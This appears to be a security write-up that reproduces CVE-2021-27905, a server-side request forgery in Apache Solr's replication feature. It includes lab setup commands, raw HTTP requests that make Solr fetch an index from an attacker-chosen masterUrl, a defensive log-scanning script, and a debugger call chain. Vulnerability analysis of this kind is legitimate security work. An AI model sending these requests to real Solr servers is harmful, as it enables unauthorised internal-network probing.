Vulnerability overview
The vulnerability lies in Solr's master/slave index replication (Replication): the request may supply an arbitrary URL, and Solr will issue an outbound request to that URL without validating it.
Vulnerability reproduction
Environment setup: download a vulnerable Apache Solr release, here Apache Solr 8.8.1
tar -zxvf solr-8.8.1.tgz # unpack the archive
sudo apt install openjdk-8-jre-headless # install the Java runtime
cd solr-8.8.1/bin/
./solr -c -f -a "-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=18522" -p 8983 # start in debug mode (JDWP listening on 18522)
./solr create -c test_solr # create a core in data-driven schema mode
CVE-2021-27905 Apache Solr SSRF
First, list the cores to obtain a core_name:
GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: 192.168.153.131:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.153.131:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Then send a fetchindex command to that core's replication handler with masterUrl pointing at a host under the tester's control (192.168.153.1:9999 here); Solr will contact it:
GET /solr/test_solr/replication?command=fetchindex&masterUrl=http://192.168.153.1:9999/testssrf HTTP/1.1
Host: 192.168.153.131:8983
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://192.168.153.131:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
https://solr.apache.org/guide/8_9/index-replication.html
My guess is that this vulnerability was found by reading the official Solr documentation: Solr has a feature for fetching an index from a specified master, and it issues the request without validating the specified URL, hence the SSRF.
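From the defender's side, the request above leaves a clear trace in Solr's request log, so one useful check is to flag fetchindex commands whose masterUrl host is not a known replication master. The following is an added example, not code from the original post or from Solr; the allow-list host and the log lines are constructed for the example (in the shape of Solr's o.a.s.c.S.Request lines).

```python
"""Flag Solr replication fetchindex requests whose masterUrl points outside an allow-list."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allow-list of hosts permitted to act as replication masters (example value).
ALLOWED_MASTER_HOSTS = {"192.168.153.10"}

# Matches the core, path and params section of a Solr request log line.
REQUEST_RE = re.compile(
    r"\[(?P<core>[^\]]+)\]\s+webapp=\S+\s+path=(?P<path>\S+)\s+params=\{(?P<params>[^}]*)\}"
)


def parse_request_line(line):
    """Return (core, path, params dict) for a Solr request log line, or None if it is not one."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = {k: v[0] for k, v in parse_qs(m.group("params"), keep_blank_values=True).items()}
    return m.group("core"), m.group("path"), params


def suspicious_fetchindex(line):
    """Return the masterUrl if the line is a fetchindex whose target host is not allow-listed."""
    parsed = parse_request_line(line)
    if parsed is None:
        return None
    _core, path, params = parsed
    if path != "/replication" or params.get("command") != "fetchindex":
        return None
    # Newer Solr releases renamed the parameter to leaderUrl; accept both spellings.
    master = params.get("masterUrl") or params.get("leaderUrl")
    if not master:
        return None
    host = urlsplit(master).hostname
    return master if host is None or host not in ALLOWED_MASTER_HOSTS else None


def scan(lines):
    """Return (core, masterUrl) for every suspicious fetchindex request in the given lines."""
    hits = []
    for line in lines:
        url = suspicious_fetchindex(line)
        if url:
            hits.append((parse_request_line(line)[0], url))
    return hits


# Constructed sample log lines: a core listing, a legitimate fetch, and an SSRF-style fetch.
SAMPLE_LOG = [
    "2021-04-10 08:00:01.123 INFO  (qtp1-15) [   x:test_solr] o.a.s.c.S.Request [test_solr]  webapp=/solr path=/admin/cores params={indexInfo=false&wt=json} status=0 QTime=3",
    "2021-04-10 08:00:05.456 INFO  (qtp1-16) [   x:test_solr] o.a.s.c.S.Request [test_solr]  webapp=/solr path=/replication params={command=fetchindex&masterUrl=http://192.168.153.10:8983/solr/test_solr} status=0 QTime=12",
    "2021-04-10 08:00:09.789 INFO  (qtp1-17) [   x:test_solr] o.a.s.c.S.Request [test_solr]  webapp=/solr path=/replication params={command=fetchindex&masterUrl=http://192.168.153.1:9999/testssrf} status=0 QTime=9",
]

if __name__ == "__main__":
    for core, url in scan(SAMPLE_LOG):
        print(f"core {core}: fetchindex from non-allow-listed master {url}")
```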
Setting up the debugging environment
With the JDWP debugger attached, the call chain to follow from the request handler down to the outbound request is:
org.apache.solr.handler.ReplicationHandler#handleRequestBody
org.apache.solr.handler.ReplicationHandler#fetchIndex
org.apache.solr.handler.ReplicationHandler#doFetch
org.apache.solr.handler.IndexFetcher#fetchLatestIndex(boolean)
org.apache.solr.handler.IndexFetcher#fetchLatestIndex(boolean, boolean)
org.apache.solr.handler.IndexFetcher#getLatestVersion